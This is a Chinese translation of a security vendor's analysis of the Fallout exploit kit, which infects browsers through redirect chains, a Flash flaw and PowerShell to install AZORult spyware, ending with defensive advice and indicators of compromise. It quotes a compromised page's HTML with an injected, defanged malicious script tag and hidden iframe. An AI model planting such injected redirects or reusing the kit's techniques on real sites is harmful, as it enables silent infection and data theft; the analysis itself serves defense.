FALLOUT工具包再现江湖,让你浏览网站时不知不觉中招

Change Web安全 2019年7月9日发布
Favorite收藏

导语:近年来,网络攻击越来越无孔不入,看似平常的活动在攻击者眼中也成为了潜在的攻击机会,作为这一趋势的最新案例,本文将展示攻击者是如何通过人们日常的浏览行为来安装AZORult的。AZORult是一类间谍软件,能从受害者计算机中窃取大量有价值的数据。

摘要

近年来,网络攻击越来越无孔不入,看似平常的活动在攻击者眼中也成为了潜在的攻击机会,作为这一趋势的最新案例,本文将展示攻击者是如何通过人们日常的浏览行为来安装AZORult的。AZORult是一类间谍软件,能从受害者计算机中窃取大量有价值的数据。

此次行动,攻击者结合了几种技术来访问用户机器:

· 使用PowerShell而不是Internet Explorer来执行最终payload,并绕过了Windows中的AMSI保护机制。

· 通过恶意重定向来识别目标计算机中的漏洞,然后动态选择相关技术来获取访问权限。

· 植入AZORult来收集受害者数据。 

介绍

你所认为的“安全”浏览却可能会在不知情的情况下暴露你的个人数据。去年,nao sec团队首次发现了Fallout漏洞利用工具包,该工具包通过在GitHub上的各种漏洞利用工具来武装自己,感染用户。而最近它们把目光转移到了一个新的Flash播放器漏洞——CVE-2018-15982上。

漏洞利用工具包(EK)是嵌入恶意或受损网页的组件,利用易受攻击的客户端应用程序在访问者主机上安装恶意软件。在日本,由于过时的、未打补丁的操作系统和第三方软件的数量相对较多,因此开发工具包通常非常活跃。

自2019年初以来,Fallout漏洞利用工具包一直用于传播GandCrab勒索软件。而最近,它被发现植入了其他类型的勒索软件和如AZORult之类的间谍软件。与其它漏洞攻击工具包使用的传统技术相比,Fallout的感染机制相当不同——传统技术通常保留在浏览器的上下文中,而Fallout则使用PowerShell来运行payload。自今年年初以来,Cybereason团队遭遇了许多与Fallout有关的感染,我们将在下文讲述其中一个案例。

1.png

Fallout的感染流程

感染过程分析

上述感染流程称为偷渡式下载(drive-by download)。用户浏览恶意或受感染的网页时,恶意代码通过漏洞利用将恶意软件下载到受害者机器上。这种做法相对简单,用户只需浏览网页就能开启感染过程,既不需要做任何额外的操作,也不需要经过用户的同意。

为了达到这一目的,漏洞利用工具包常常会破坏合法的网站,并通过利用各种web漏洞(有时使用XSS)将其感染,再经过一系列网页重定向后将用户导到工具包的登录页面。登陆页面是最后一个恶意页面,它会触发某个漏洞的利用代码。大多数此类网站都是制作成人内容的网站,因为这些网站很热门,能为攻击者带来最大化感染。

通过检查PowerShell的父进程iexplore.exe,我们可以看到受害者在浏览网页时使用的是Internet Explorer。

2.png

识别用户访问的链接

下图演示了前面提到的重定向过程。

3.png

在显示EK登陆页面之前进行的一系列重定向

通过使用WHOIS来检查域名的创建日期记录,我们可以看到该域名是最近注册的,这点是可疑的。以托管在荷兰的“tracpadsforgame [.] info”的WHOIS记录(从DomainTools中获取)为例:

域名:TRACPADSFORGAME [.] INFO

注册表域ID:D503300000129283219-LRMS

注册商WHOIS服务器:whois.namecheap.com

注册商网址:www.namecheap.com

更新日期:2019-02-04

创建日期:2018-08-08

注册日期到期日:2019-08-08

而在以前的攻击行动中,已有研究人员注意到过上述域名。在2月下旬,该域出现在了RIG EK和AZORult的配对组合中。

下面是托管在“tracpadsforgame [.] info”上的恶意重定向的代码片段。此链接在感染时使用,攻击者经常轮换链接。此代码段在一系列重定向中的其中一个页面上。

<script>
(function(h,o,t,j,a,r){
h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)};
h._hjSettings={hjid:623500,hjsv:5};
a=o.getElementsByTagName('head')[0];
r=o.createElement('script');r.async=1;
r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv;
a.appendChild(r);
})(window,document,'//static.hotjar.com/c/hotjar-','.js?sv=');
</script>
</head>
<body class="">
<script type='text/javascript' src='hxxp://cantouchthis[.]xyz' [SANITIZED]></script><iframe onload="window.setTimeout('visits()', 99)" src='about:blank' style='position:absolute; top:22px; left:-2144px;'></iframe>›
<section class="m-above-header">
<div class="container">
<div class="row">
<div class="m-above-header__inner">
<div class="col-lg-6 col-md-7 m-above-header__inner__left">
<ul>
<li><span>Check </span><a href="https://www[.]ccgmining[.]com/profit-calculator.php" class="profit-calc right-arrow">profit calculator <span class="text-arrow-up">»</span></a></li>
<li><a href="tel:"></a></li>
<li><a href="https://www[.]ccgmining[.]com/cdn-cgi/l/email-protection#2e4d41405a4f4d5a6e4d4d49434740474049004d4143"><span class="__cf_email__" data-cfemail="35565a5b4154564175565652585c5b5c5b521b565a58"></span></a></li>
<li><a href="https://www[.]ccgmining[.]com/supporttickets.php" class="support right-arrow">support <span class="text-arrow-up">»</span></a></li>
</ul>

代码的噪声中隐藏了一个恶意iframe标记。iframe会加载恶意域cantouchthis[.]xyz。

加载的cantouchthis[.]xyz页面包含了更多混淆的JavaScript代码。通过清理代码并提取相关的部分,得到如下片段。

4.png

JavaScript代码,浏览器指纹识别

在代码的末尾,使用了eval函数。

5.png

JavaScript代码中的eval函数

eval函数编译并执行JavaScript代码。从历史上看,它既是JavaScript中最强大的函数,也是被滥用最多的函数。

6.png

传递给eval函数的去混淆代码

上面的输出是另一组稍微混淆过的代码,这段代码用于执行一系列浏览器检查,以确定受害者是否在使用某些特定的浏览器,如果不是就略过,如果检查通过,代码将动态生成一个额外的恶意iframe,以便在visits()中进一步重定向用户。下一个Base64字符串解码为hxxp://ad3[.]dogfunnyvideos[.]]xyz/mydoggystylewithyourkitty,这是用户被重定向到的地方。类似的过程可能重复发生,直到到达最终的恶意页面。

7.png

Cybereason解决方案中看到的解码域

如果漏洞利用工具包对受害者浏览器的检查通过,受害者将被重定向到最终的登录页面,并在此页面选择最相关的漏洞,在本例中是Flash Player的漏洞CVE-2018-15982,然后从相应的GitHub页面下载利用代码。

8.png

从GitHub下载漏洞利用

FALLOUT EK的后感染分析

一旦FALLOUT EK访问了受害者的计算机,它就会执行PowerShell作为iexplore.exe的子进程。

9.png

在Cybereason解决方案中看到的执行树

10.png

Cybereason解决方案检测到的PowerShell恶意实例

PowerShell实例正在运行一个Base64编码的混淆命令,它负责执行最终的payload。

11.png

部分解码后的命令,用于执行最终payload

通过使用PowerShell执行最终payload,Fallout能绕过Windows中的反恶意软件扫描接口(AMSI)保护机制,AZORult也由PowerShell脚本植入。

12.png

在Cybereason解决方案中看到的恶意进程

AZORult Infostealer是一款间谍软件,可从受损主机收集各种有价值的数据,如比特币钱包、敏感文件、保存的登录数据、Web Cookie等。该恶意软件具有内置的下载程序功能,并且会植入其他的恶意软件。在过去,AZORult则主要是通过EK和malspam广告行动来传递的。

初始感染后,AZORult与其C2服务器通信,能过滤它收集到的任何数据。

13.png

AZORult与其C2服务器进行通信

安全建议

· 将所有第三方软件更新为最新版本。如果不需要第三方软件的组件,请考虑将其删除。

· 养成良好的浏览习惯。

结论

漏洞利用工具包并不新鲜,不过我们仍然看到攻击者在感染传递链上下足了功夫,通过结合不同技术、漏洞利用甚至payload来逃避检测,就像在本文中Fallout EK与AZORult的结合一样。

而攻击者还想到了通过破坏高流量的合法网站,使之成为有效的攻击载体,能尽可能地为自己牟利;还通过结合逃避技术和多个恶意重定向来识别漏洞,让EK能找出成功感染的最佳漏洞。

这延续了我们在过去一年看到的一种趋势,即攻击者甚至将常见的活动都变成了潜在的攻击。我们必须问自己的问题是,企业如何抵御利用用户“安全”行为的攻击?此外,我们为员工提供了哪些安全建议来防止此类攻击?

IoC

Payload (AZORult):

SHA-1: 4f2e67981341e6458301328be6d26f0b8e3bffe3

域名:

i4you[.]id

ad3[.]dogfunnyvideos[.]xyz

cantouchthis[.]xyz

tracpadsforgame[.]info

IP:

108[.]61[.]57[.]77

5[.]23[.]49[.]200

185[.]56[.]233[.]186

91[.]235[.]129[.]167

本文翻译自:https://www.cybereason.com/blog/watch-where-you-browse-the-fallout-exploit-kit-stays-active如若转载,请注明原文地址: https://www.4hou.com/web/19106.html
点赞 3
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论